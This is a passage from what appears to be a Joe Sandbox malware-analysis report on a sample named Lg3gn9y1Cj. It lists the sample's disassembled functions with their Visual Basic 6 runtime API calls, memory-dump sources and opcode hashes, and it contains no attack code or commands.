                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba_adj_fdiv_m64
                                                                                    • String ID: x.@
                                                                                    • API String ID: 2746309926-3631786054
                                                                                    • Opcode ID: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                    • Instruction ID: e2d31677cc0c5545fa80c966f8e09b0dd77fe682f18f487efa9605fdaabcacac
                                                                                    • Opcode Fuzzy Hash: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                    • Instruction Fuzzy Hash: CD216831B046119FD7099F14FA4433BBBA6B7C8341F55867EE485D22A4CB788895C749
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004291A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291EA
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291F8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429203
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429223
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042922C
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429236
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042923F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                    • String ID:
                                                                                    • API String ID: 2392155486-0
                                                                                    • Opcode ID: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                    • Instruction ID: 083221939679d71a8f0af14ea155fa08f788ddfb085ab1f4567514e6edbf7ed0
                                                                                    • Opcode Fuzzy Hash: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                    • Instruction Fuzzy Hash: 64119A71940654BBCB00AFA4CE49E9EBBB8FF48B00F10806AF841B22A1C77815408BF9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00428BBE Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00428BBE
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00428C0D), ref: 00428BE2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BEA
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BF2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BFA
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C02
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Destruct$ExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 1594393734-0
                                                                                    • Opcode ID: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                    • Instruction ID: 9365795d6c175bddc2ceeb307a93c3593e60e9969e1da01e8ce20a231f89a0e7
                                                                                    • Opcode Fuzzy Hash: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                    • Instruction Fuzzy Hash: 9BE0ACB29441286AEB4097D0EC41FBD7B3CEB84701F44411AF606AA0989AA42A44CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415EC0 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(660E6C30,660E6A76,00000000), ref: 00415F0F
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,660E6C30,660E6A76,00000000), ref: 00415F27
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckErrorHresultSystem$FreeNew2
                                                                                    • String ID:
                                                                                    • API String ID: 4095944179-0
                                                                                    • Opcode ID: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                    • Instruction ID: 86e52eac19165ff6a91ac7dd53a600c53f32cd3851e5c07b860265a300e2eb8b
                                                                                    • Opcode Fuzzy Hash: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                    • Instruction Fuzzy Hash: AA218674A00645EBCB20DBA4EE89FDEBB74EB58741F50012AF145B31E0D77859428BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A4A0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0041A8A0,?,?,00000000,Function_000032B6), ref: 0041A4BE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A4EE
                                                                                      • Part of subcall function 0041A2B0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                      • Part of subcall function 0041A2B0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                    • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000,?,?,?,?,00000000,Function_000032B6), ref: 0041A51C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A53C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A559
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041A575
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 1207130036-0
                                                                                    • Opcode ID: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                    • Instruction ID: 0ffcf597171400e777aa296a20f0d346976af0d8bd5363bbaeaa7b020b9ff71b
                                                                                    • Opcode Fuzzy Hash: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                    • Instruction Fuzzy Hash: 5821D8B5D00648EBDB00EFE5DA49BDEBBB4FB48714F108269E500B7390C7795A44CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429280 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292BF
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292CD
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292D8
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292F8
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429301
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429307
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                    • String ID:
                                                                                    • API String ID: 2075080343-0
                                                                                    • Opcode ID: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                    • Instruction ID: 9ff539ebce5fad2b4699ffef5be23d845548c77eebf422f0d85762e4eecb91bf
                                                                                    • Opcode Fuzzy Hash: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
                                                                                    • Instruction Fuzzy Hash: 88018B71940214ABCB00AFA4CE48E9EBBB8FF48701F50406AF845B22A0CB7C55008AB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004200AF Relevance: 9.0, APIs: 6, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 004200BC
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 004200C6
                                                                                    • #529.MSVBVM60(00004008), ref: 004200E2
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004200EF
                                                                                    • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CloseFile$#529DestructExitFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 4288299288-0
                                                                                    • Opcode ID: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
                                                                                    • Instruction ID: e63006f6629530c6f9d06262b1e3e783061ea391c4db22c70a24105a95955a76
                                                                                    • Opcode Fuzzy Hash: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
                                                                                    • Instruction Fuzzy Hash: 39F0E775D00218CECF10EFA0DD44BEDB7B8BB48300F4081AAE54AA7560DB741A89CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E67F Relevance: 9.0, APIs: 6, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E68B
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E693
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041E695
                                                                                    • __vbaFreeVar.MSVBVM60(0041E706), ref: 0041E6F2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E6FA
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041E703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AddrefFree$DestructExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 474453485-0
                                                                                    • Opcode ID: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                    • Instruction ID: 667f1fbceb99d918350a8c93aba1b8ec047f02208f043dfad400775f7d70227f
                                                                                    • Opcode Fuzzy Hash: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                    • Instruction Fuzzy Hash: A6E0E531D60128AADB04DBA0ED55FED7B38BF14700F54406AF902B30E09F746945CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420B94 Relevance: 9.0, APIs: 6, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420BA1
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420BAB
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00420BB4
                                                                                    • __vbaFreeStr.MSVBVM60(00420BF8), ref: 00420BEB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00420BF0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00420BF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$CloseFile$ExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 2014117853-0
                                                                                    • Opcode ID: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                    • Instruction ID: 1a74a742803cabf7b99f207da3827670e0b1cecb12e14af3a137c0d733611b17
                                                                                    • Opcode Fuzzy Hash: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                    • Instruction Fuzzy Hash: 3FE01A71D04128CACB14ABE0FD4069C7BB4AB08310B904167A402B3174DB742985CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418C10 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00418D00: __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,660E6A76,660E6C30,?), ref: 00418D1E
                                                                                      • Part of subcall function 00418D00: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                      • Part of subcall function 00418D00: __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                      • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                      • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                      • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                      • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                      • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                      • Part of subcall function 00418D00: __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                      • Part of subcall function 00418D00: __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                      • Part of subcall function 00418D00: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                      • Part of subcall function 004199F0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 00419A0E
                                                                                      • Part of subcall function 004199F0: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 00419A3E
                                                                                      • Part of subcall function 004199F0: __vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 00419A68
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188), ref: 00418C86
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00418C96
                                                                                    • __vbaI4Var.MSVBVM60(?,00000000), ref: 00418CA9
                                                                                    • __vbaFreeObj.MSVBVM60(00000000), ref: 00418CB8
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00418CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Ansi$Error$Free$ChkstkMoveSystem$CallCheckHresultLateList
                                                                                    • String ID:
                                                                                    • API String ID: 873780948-0
                                                                                    • Opcode ID: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                    • Instruction ID: 16d286b73a6ce5193caf80716aadf59a34bdb77ef37626ee72a0c3f1c06fc46a
                                                                                    • Opcode Fuzzy Hash: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                    • Instruction Fuzzy Hash: 63211DB5900209ABCB00DF95C989DEFBBBCEF58704F10451EF901B7250DA74A985CBB5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00416000 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorFreeNew2System
                                                                                    • String ID:
                                                                                    • API String ID: 3252491692-0
                                                                                    • Opcode ID: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                    • Instruction ID: 1035c00175c6c81f3f144980975e95b43d78c84e63a20c1226013f986c834cc1
                                                                                    • Opcode Fuzzy Hash: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                    • Instruction Fuzzy Hash: 30219570A40615EBCB20CFA5EE49E9FBF78FB58740F110126F105B32E0D7B499818BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404972 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 4045702744-0
                                                                                    • Opcode ID: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                    • Instruction ID: edda45edb35fde8433b36ffd3ef84c2269d30266a9ece54bd624009aaa599c45
                                                                                    • Opcode Fuzzy Hash: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                    • Instruction Fuzzy Hash: 34215870901214EFCB00DFA5CA48E9EBBF8FF98704F64456AF405B72A0CB7859458AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420F00 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,-00000009,?,660E6A9B,0041FB86), ref: 00420F20
                                                                                    • __vbaI2I4.MSVBVM60(00000000,-00000009,?,660E6A9B,0041FB86), ref: 00420F27
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F4D
                                                                                    • __vbaI2I4.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F54
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,660E6A9B,0041FB86), ref: 00420F72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 2760075901-0
                                                                                    • Opcode ID: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                    • Instruction ID: 93c54f63ccc5981ea9e36820505c7139a37b1fec0ba499ff43ef88027195e6a9
